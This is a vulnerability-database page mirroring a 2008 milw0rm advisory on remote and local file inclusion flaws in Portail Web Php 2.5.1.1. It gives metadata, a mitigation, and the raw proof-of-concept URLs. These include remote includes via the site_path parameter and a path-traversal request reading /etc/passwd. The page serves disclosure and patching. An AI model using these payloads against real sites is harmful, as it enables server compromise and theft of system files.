header-logo
Suggest Exploit
vendor:
Portail Web Php
by:
Tryagi
7.5
CVSS
HIGH
Multiple Remote/Local File Inclusion
98
CWE
Product Name: Portail Web Php
Affected Version From: 2.5.1.1
Affected Version To: 2.5.1.1
Patch Exists: YES
Related CWE: N/A
CPE: a:portail_web_php:portail_web_php:2.5.1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Portail Web Php <= 2.5.1.1 Multiple Remote/Local File Inclusion Vulnerabilities

Portail Web Php version 2.5.1.1 is vulnerable to multiple remote and local file inclusion vulnerabilities. The remote file inclusion vulnerability can be exploited by sending a malicious URL to the vulnerable parameter 'site_path' in the 'template/Vert/index.php', 'template/Noir/index.php' and 'template/Bleu/index.php' scripts. The local file inclusion vulnerability can be exploited by sending a malicious URL to the vulnerable parameter 'page' in the 'PwP2.5.1.1/' script.

Mitigation:

Upgrade to the latest version of Portail Web Php.
Source

Exploit-DB raw data:

### Portail Web Php <= 2.5.1.1 Multiple Remote/Local File Inclusion Vulnerabilities
### http://surfnet.dl.sourceforge.net/sourceforge/portail-web-php/PwP2.5.1.1.rar
### POC :
### I- Remote File Inclusion
### /PwP2.5.1.1/template/Vert/index.php?site_path=http://localhost/020.txt
### /PwP2.5.1.1/template/Noir/index.php?site_path=http://localhost/020.txt
### /PwP2.5.1.1/template/Bleu/index.php?site_path=http://localhost/020.txt
### II- Local File Inclusion
### /PwP2.5.1.1/?page=../../../../../../../../etc/passwd
### I'm Tryagi - Tryag.Cc/cc - Mahmood_ali  :) 

# milw0rm.com [2008-02-24]

Navigation

Suggest Exploit

Services By CQR